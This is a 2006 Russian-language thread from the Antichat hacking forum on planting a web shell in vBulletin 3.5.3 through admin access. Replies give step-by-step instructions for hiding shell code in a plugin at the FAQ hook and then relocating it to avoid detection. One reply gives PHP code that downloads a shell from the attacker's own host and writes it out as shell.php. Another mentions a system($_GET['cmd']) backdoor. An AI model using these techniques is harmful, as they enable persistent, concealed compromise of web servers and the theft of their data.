ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Форумы
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Шелл vBulletin 3.5.3
  #1  
Старый 17.07.2006, 14:37
bandera
Познающий
Регистрация: 02.06.2006
Сообщений: 66
Провел на форуме:
870911

Репутация: 69
По умолчанию Шелл vBulletin 3.5.3

В поиске был, так ничего и не нашёл. -)
Имею доступ к админке, можно ли всётаки как нибудь залить шелл?
 
Ответить с цитированием

  #2  
Старый 17.07.2006, 14:42
Enk0r
Познающий
Регистрация: 23.06.2006
Сообщений: 85
Провел на форуме:
1812004

Репутация: 169
По умолчанию

Наверное никак...
 
Ответить с цитированием

  #3  
Старый 17.07.2006, 18:51
Geniy
Новичок
Регистрация: 19.04.2006
Сообщений: 16
Провел на форуме:
125446

Репутация: 5
По умолчанию

Хватит дезинформировать народ.. Залить можно через модули.. Видео скора сниму...
 
Ответить с цитированием

  #4  
Старый 17.07.2006, 19:31
Azazel
Заведующий всем
Регистрация: 17.04.2005
Сообщений: 1,062
Провел на форуме:
5957900

Репутация: 561


По умолчанию

Не знаю можно ли это на 3.5.3. Но попробуй пройтись по одной из ссылок внизу топика. ShAnKaR описывал.
__________________
Full DNS report
 
Ответить с цитированием

  #5  
Старый 17.07.2006, 20:42
bandera
Познающий
Регистрация: 02.06.2006
Сообщений: 66
Провел на форуме:
870911

Репутация: 69
По умолчанию

Цитата:
Сообщение от Geniy  
Хватит дезинформировать народ.. Залить можно через модули.. Видео скора сниму...
Можно объяснить по подробней, а то пока видео дождёшься...
 
Ответить с цитированием

  #6  
Старый 17.07.2006, 21:00
Tem
Banned
Регистрация: 05.10.2005
Сообщений: 965
Провел на форуме:
5888800

Репутация: 547


Отправить сообщение для Tem с помощью ICQ
По умолчанию

А ты через смайлы пробовал , у меня тожа один раз такая проблемка вышла , я даже сам не поверл когда залил шелл через смайлики.
 
Ответить с цитированием

  #7  
Старый 17.07.2006, 21:17
WEB'er
Новичок
Регистрация: 26.06.2006
Сообщений: 21
Провел на форуме:
236693

Репутация: 5
По умолчанию

А нужно именно залить? Там же вроде в шалоны можно Php-код вставлять .... Или нет?=) Заинклудь шелл со своего хоста а там разбирёшься=)
 
Ответить с цитированием

  #8  
Старый 17.07.2006, 21:21
Geniy
Новичок
Регистрация: 19.04.2006
Сообщений: 16
Провел на форуме:
125446

Репутация: 5
По умолчанию

Ладно - обойдёмся без видео:
Берешь шелл не больше 60кб,
Адмминка-Система модулей- добавить новый модуль.
Продукт Vbulletin
Месторасположение: Vbulletin: Справка - faq_complete
В тело вставляешь код шелла предварительно убрав в начале <? и в конце ?>
Затем прост о заходишь в справку из форума и любуешся своим шеллом.

Советую сразу перезалить шелл в другое место - а этот удалить - мало-ли кому взбредёт справку глянуть
 
Ответить с цитированием

  #9  
Старый 17.07.2006, 23:02
WEB'er
Новичок
Регистрация: 26.06.2006
Сообщений: 21
Провел на форуме:
236693

Репутация: 5
По умолчанию

Geniy
на 3.5.4 у меня не пашет=(

2 ALL
вот мой немного дебильный способ=)

Заливаем куда-нить с себе на хост шелл под именем - "shell.txt"

Создаём новый модуль. Местоположение хака - "Calendar_start"
Даём ему какое-нить неприметное имя=)
И пишем код:
Код:
$file = fopen("http://ВАШ_СЕРВЕР.ru/shell.txt", "r");
$fp = fopen('shell.php', 'a');
while ($line = fgets($file, 4096) )
{  
$line.="\n";  
fwrite($fp, ''.$line.'');
}
fclose($fp);
fclose($file);
теперь идём по ссылке - _http://servak.com/forum/shell.php - вот он наш шелл.

Проверял всё это дело на локалхосте - работает. Работоспособность будет зависеть от настроек апача, или что там у вас стоит=). Конечно способ идиотский, но у меня на локалхосте больше ничего не срабатывало=( : ни инклудинг, ни "system($id);", ни через смайлы ... ТОлько вот этот способ=)
 
Ответить с цитированием

  #10  
Старый 17.07.2006, 23:14
Brahma
Познающий
Регистрация: 14.07.2006
Сообщений: 85
Провел на форуме:
72678

Репутация: 31
По умолчанию

Видимо обычный system($_GET["cmd"]); ужэ не рулёз )
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Как убрать копирайты в титле (powered by....) в vBulletin 3.5.3? blaga Форумы 20 30.05.2009 17:18
Вопрос по авам в vBulletin 3.5.3 blaga Форумы 7 25.05.2006 13:23
вопрос по vBulletin 3.5.3 bastard Форумы 3 29.04.2006 11:11



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ